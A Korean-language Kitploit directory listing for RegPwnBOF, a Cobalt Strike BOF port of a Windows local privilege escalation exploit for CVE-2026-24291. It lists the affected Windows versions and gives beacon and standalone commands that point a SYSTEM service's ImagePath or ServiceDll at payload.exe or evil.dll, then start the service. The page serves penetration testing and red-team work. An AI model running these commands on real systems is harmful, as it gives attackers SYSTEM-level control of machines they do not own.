Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
RegPwnBOF — MDSec의 RegPwn의 Bof | Kitploit
도구/GitHubGitHub/flangvik/regpwnbof
Privilege EscalationExploitationPost-ExploitationPenetration TestingRed Teaming
GitHubflangvik/regpwnbof

RegPwnBOF

MDSec의 RegPwn의 Bof

저장소 보기
127105개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

RegPwn BOF

Cobalt Strike BOF 포트로, Filip Dragovic (@Wh04m1001) / MDSec ActiveBreach의 RegPwn 익스플로잇을 기반으로 합니다.

이는 원래 C# 익스플로잇을 대충 BOF로 재구현한 것입니다. 취약점 연구 및 익스플로잇에 대한 모든 공로는 Filip Dragovic과 MDSec에 있습니다.

  • 블로그 포스트: https://www.mdsec.co.uk/2026/03/rip-regpwn/
  • 원본 저장소: https://github.com/mdsecactivebreach/RegPwn
  • CVE: CVE-2026-24291

기능

Windows 접근성 ATConfig 메커니즘의 레지스트리 심볼릭 링크 경쟁 조건을 악용하여 일반 사용자 컨텍스트에서 보호된 HKLM 레지스트리 키에 임의의 값을 작성합니다 (로컬 권한 상승).

Windows 11 25H2/24H2, Windows 10 21H2 및 Windows Server 2016/2019/2022 2026년 3월 패치 이전을 대상으로 합니다.

경고: 이 익스플로잇은 경쟁 조건의 일부로 워크스테이션을 잠급니다.

기본 대상

msiserver (Windows Installer) 서비스의 ImagePath. 이 서비스는 SYSTEM으로 실행되며 일반 사용자가 시작할 수 있습니다.

사용법

Cobalt Strike

스크립트 관리자에서 regpwn.cna를 로드한 후:

root@kitploit:~
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll

독립 실행형 테스트

root@kitploit:~
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath

익스플로잇이 성공한 후, 서비스를 시작하여 SYSTEM으로 실행합니다:

root@kitploit:~
net start msiserver

빌드

x86_64-w64-mingw32-gcc (MinGW-w64 크로스 컴파일러)가 필요합니다.

root@kitploit:~
make        # BOF 빌드 (regpwn.x64.o)
make test   # 독립 실행형 EXE 빌드 (regpwn.x64.exe)
make clean

x64 전용.

도구 다운로드